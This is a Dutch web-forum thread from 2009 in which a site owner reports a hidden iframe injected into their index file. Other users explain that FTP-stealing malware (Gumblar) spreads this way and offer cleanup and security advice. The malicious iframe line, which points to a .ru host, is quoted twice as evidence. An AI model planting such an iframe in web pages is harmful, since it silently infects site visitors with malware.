Mensen op mijn site klagen over een virus en als ik ga kijken in de index file stond er opeens dit in:
<iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe>
Iemand enig idee wat de fuck dit is en hoe dat daar komt????
Hoe het er komt? Iemand heeft je index aangepast?
Hoe? Lekke server, brakke code of brakke FTP gegevens.
quote:liftOp maandag 13 juli 2009 20:31 schreef Ezechielk het volgende:
Wat dit is? Een virus.
Hoe het er komt? Iemand heeft je index aangepast?
Hoe? Lekke server, brakke code of brakke FTP gegevens.
hoe dat komt? omdat je je beveiliging te laag hebt staan!
opknopen zoiets
Tip: alle html bestanden checken op iframes en die eruit gooien. (Gewoon alle code tussen/inclusief <iframe....></iframe>) Dan ook je computer scannen. Bij mij vind Avast! iig foute iframes.
Je kan dit al doen door via Windows te zoeken naar *.html, *.htm, *.php, *.asp bestanden die het woord 'iframe' bevatten, geloof ik.
Als jij die index er zelf niet neer hebt gezet, komt het van de server van je webhosting af. Zou in dat geval even contact opnemen met ze, want dat is nogal lomp...
quote:Kijk ook even of je site al op de zwarte lijst staat van Google. Gaat het eenvoudigst als je een site bezoekt met FireFox, je krijgt dan in plaats van de site in kwestie een rood waarschuwingsscherm te zien.Op maandag 13 juli 2009 20:27 schreef FortunaHome het volgende:
Hallo,
Mensen op mijn site klagen over een virus en als ik ga kijken in de index file stond er opeens dit in:
<iframe src="http://a5j.ru:8080/ts/in.cgi?pepsi100" width=125 height=125 style="visibility: hidden"></iframe>
Iemand enig idee wat de fuck dit is en hoe dat daar komt????
De laatste tijd zijn er veel besmette websites gesignaleerd. Dat werkt als volgt:
1. Iemand bezoekt een (bonafide) reeds besmette website, die de computer van de bezoeker infecteert.
2. Een stukje malware op de zojuist besmette computer gaat op zoek naar FTP inloggegevens. Worden deze gevonden, dan worden ze doorgegeven aan de maker (c.q. verspreider) van de malware.
3. De maker c.q. verspreider van de malware gebruikt de buitgemaakte inloggegevens om de betreffende websites aan te passen c.q. te infecteren met een stukje obfuscated javascript o.i.d.
4. Nietsvermoedende bezoekers blijven de voorheen als betrouwbaar bekend staande site bezoeken, waardoor ook hún computers worden geïnfecteerd.
5. Ga terug naar stap 1 om te lezen wat er nu weer met deze computers gebeurt ...
Op deze manier ontstaat dus een soort sneeuwbaleffect. Je moet in ieder geval de computer(s) die je hebt gebruikt voor het updaten van je site onderzoeken op malware, tenminste één hiervan is besmet. Je moet natuurlijk ook meteen het FTP wachtwoord dat je gebruikt om je site te updaten wijzigen, want je inloggegevens zijn immers gestolen. En je moet alle pagina's van je site nakijken. Als je al op de zwarte lijst van Google terecht bent gekomen, dan kun je na het opschonen een verzoek indienen om je site opnieuw te laten scannen. Wordt de site dan clean bevonden, dan wordt deze weer van de zwarte lijst gehaald.
Het lijkt er vooralsnog op dat alleen bestanden die met index beginnen zijn aangetast
Bij sommige sites heb ik 2 weken lang elke dag het html bestand moeten downloaden en de iframe moeten verwijderen, op een vast tijdstip (half 8 smorgens) werd het automatisch weer geplaatst door een of ander kutscript die de hackers gebruiken.. Verder herken je de hidden iframe's meestal vet snel omdat het heel je layout verneukt. Hadden ze beter anders kunnen doen met een hidden div maargoed, dood aan die kuthackers.
.quote:Wat heeft dat er nu weer mee te maken?Op maandag 13 juli 2009 21:16 schreef Adidah het volgende:
Om deze reden zou ik dus nooit een web server ook als werkstation gebruiken
quote:Nou, wat denk je zelf?Op maandag 13 juli 2009 21:16 schreef Ame_thyst het volgende:
[..]
Wat heeft dat er nu weer mee te maken?
quote:Ik kom nooit op die siteBlijkbaar heb jij -of iemand gebruik makend maakt van jouw IP adres- zich niet aan de voorschriften van onze site gehouden.
Ben je het niet eens met deze beslissing, stuur dan een email naar webmaster@fortunahome.com.
quote:Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.
quote:Het gaat om de FTP-gegevens, denk je dat ik op een webserver ga lopen internetten
quote:Denk dat ik de opgeslagen wachtwoorden maar 'es uit m'n FTP-client ga verwijderen...Op maandag 13 juli 2009 22:22 schreef Ame_thyst het volgende:
[..]
Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.
quote:Op maandag 13 juli 2009 22:22 schreef Ame_thyst het volgende:
[..]
Dit virus jat FTP gegevens. Heeft niet veel te maken met workstation of servers.
Iedere pc met een FTP client welke verbinding maakt met een webserver is de lul.
quote:Op maandag 13 juli 2009 22:24 schreef ukker het volgende:
[..]
Het gaat om de FTP-gegevens, denk je dat ik op een webserver ga lopen internetten
quote:Daarom moet je dus ook geen wachtwoorden laten onthoudenOp maandag 13 juli 2009 22:25 schreef AquaMaryn het volgende:
[..]
Denk dat ik de opgeslagen wachtwoorden maar 'es uit m'n FTP-client ga verwijderen...
. Als je wachtwoorden opslaat, maakt het qua beveiliging geen fuck meer uit of het om een werkstation of server gaat.quote:I know, maar het is zo makkelijk!! Wachtwoorden van websites sla ik sowieso nooit op, maar aan FTP had ik eigenlijk nooit gedacht, dat zit ten slotte in een apart client... maar daar heb je dus ook niets aan.Op maandag 13 juli 2009 22:34 schreef Adidah het volgende:
[..]
[..]
[..]
Daarom moet je dus ook geen wachtwoorden laten onthouden
quote:Daarom zou een besturingssysteem gewoon een beveiligde keyring moeten hebben zodat niet ieder virus zomaar bij de opgeslagen wachtwoorden kan.Op maandag 13 juli 2009 @ 22:34 schreef Adidah het volgende:
[..]
[..]
[..]
Daarom moet je dus ook geen wachtwoorden laten onthouden
quote:Totdat slimme hackertjes die keyring weer weten te kraken...Op dinsdag 14 juli 2009 00:09 schreef doppendoosch het volgende:
[..]
Daarom zou een besturingssysteem gewoon een beveiligde keyring moeten hebben zodat niet ieder virus zomaar bij de opgeslagen wachtwoorden kan.
Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet.
Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten
quote:Waarschijnlijk is het gewoon een scriptkiddy die zich even lekker aan het uitleven was. Beetje slim omgaan met je inloggegevens ljikt me ook wel het meest vanzelfsprekende imho.Op dinsdag 14 juli 2009 10:21 schreef FortunaHome het volgende:
Thanks voor de tips allemaal. Ik heb de mensen die de site updaten geadviseerd het veranderde ftp wachtwoord niet meer op te slaan maar steeds zelf in te tikken. Dan ondervang je tenminste iets.
Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet.
Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten
quote:Ja FTP ja... het moet een beetje simpel blijven om te updaten he... Het is een vrije tijds pagina die door vrijwilligers omhoog wordt gehouden.
Maarja, je hebt altijd van die betweters als jij natuurlijk
Misschien eens wat minder rotzooi openen die je via Incredimail binnen krijgt. ;')quote:ssh, rcp, scp?
Er is niks mis met FTP. Hoe wil je anders je pagina's uploaden. Zeker via een webinterface van Plesk of iets wat er op lijkt.
quote:Dude...
Er is niks mis met FTP. Hoe wil je anders je pagina's uploaden. Zeker via een webinterface van Plesk of iets wat er op lijkt.
quote:RCP is ook unencrypted, dus onveilig... Iets over SSH (SCP, SFTP, of SVN+SSH) zijn wat mij betreft de way to go...
CasB: FTP is zo LEK als een mandje. Dat is wat er mis mee is.
Gaat niet werken dus we blijven bij ftp met de nodige risico's dan maar...
quote:ssh gaat op zelfde manier als ftp. Is alleen een andere poort
En hoe ga ik mensen die de hele dag op hun werk zitten en 's avonds in hun vrije tijd de pagina wat updaten uitleggen dat ze dit soort tools moeten gaan gebruiken
Gaat niet werken dus we blijven bij ftp met de nodige risico's dan maar...
OpenSSH maakt bijvoorbeeld gebruik van sftp (secure ftp) ipv ftp.
quote:Dat gebeurt niet, want als dat zo makkelijk gaat kun je net zo goed gelijk die FTP-server kraken zonder omweg.Op dinsdag 14 juli 2009 01:17 schreef AquaMaryn het volgende:
[..]
Totdat slimme hackertjes die keyring weer weten te kraken...
quote:allemaal protocollen die niet gemaakt zijn voor bestandsoverdracht..
ik heb gelukkig gewoon lokaal toegang tot server
quote:mscheel weet weer eens perfect waar 'ie het over heeft hoor...
[..]
allemaal protocollen die niet gemaakt zijn voor bestandsoverdracht..
ik heb gelukkig gewoon lokaal toegang tot server
quote:Dude, lees je eens in voordat je dom gaat lopen bazelen, uberdummy...Secure Copy or SCP is a means of securely transferring computer files between a local and a remote host or between two remote hosts, using the Secure Shell (SSH) protocol.
Bah bah...
quote:You are right
Whoops, niet iedereen heeft een eigen server en ik denk dat de meeste hosters alleen maar FTP access aanbieden voor eea. Zodra je een eigen server hebt is sftp wel de way to go.
Hoogste tijd dus dat hosters standaard een veiliger methode gebruiken. Het is echt niets moeilijker dan FTP, zoals hier gesuggereerd wordt.
De enkele andere plek waarop FTP gegevens van mijn server staan is op de windows PC op mijn werk, maar ik ben al sinds 1,5e week vrij. Het lijkt me niet dat zo'n script 10 dagen gaat wachten met het hacken van een server. Dan zou enkel een collega die op mijn computer heeft gezeten iets verdachts moeten hebben bekeken. Maar ja, dit houdt in dat ook alle sites van ons en onze klanten gevaar lopen, maar tot nu toe heb ik nog niets raars gezien op die sites.
Topic aangemaakt ook al over MM zn probleem
[ Bericht 38% gewijzigd door mschol op 10-08-2009 00:29:19 ]
quote:Webserver draait op Unix.Op maandag 13 juli 2009 21:16 schreef Ame_thyst het volgende:
Ook last van gehad. Bewijst maar weer hoe kut windows is.
quote:ja, maar het virus wat de wachtwoorden zoekt en doorspeelt werkt in een windowsomgeving en kennelijk is het dus gewoon mogelijk dat wanneer een iframe wordt aangeroepen in een pagina met daarop een trojan windows zonder problemen deze gaat runnen.
gumblar virus blijkt nu. Komt binnen via adobe reader en adobe flash. Dr zitten lekker in. Updaten, van de abode shizzle is een must.
Ik hou van avast die een mooi alarm geeft en schreeuwt dat er een bad iframe is
quote:Tot ze een keylogger oid op hun pc hebben staanOp dinsdag 14 juli 2009 10:21 schreef FortunaHome het volgende:
Thanks voor de tips allemaal. Ik heb de mensen die de site updaten geadviseerd het veranderde ftp wachtwoord niet meer op te slaan maar steeds zelf in te tikken. Dan ondervang je tenminste iets.
Ondertussen heeft onze hosting provider een backup teruggegooid van 3 dagen geleden, echter nu werken weer een hoop zaken niet.
Echt triest dat een paar van die blije hacker nerds ons zo ontzettend veel tijd kosten
Dus let op wat je download ook bij newsgroepen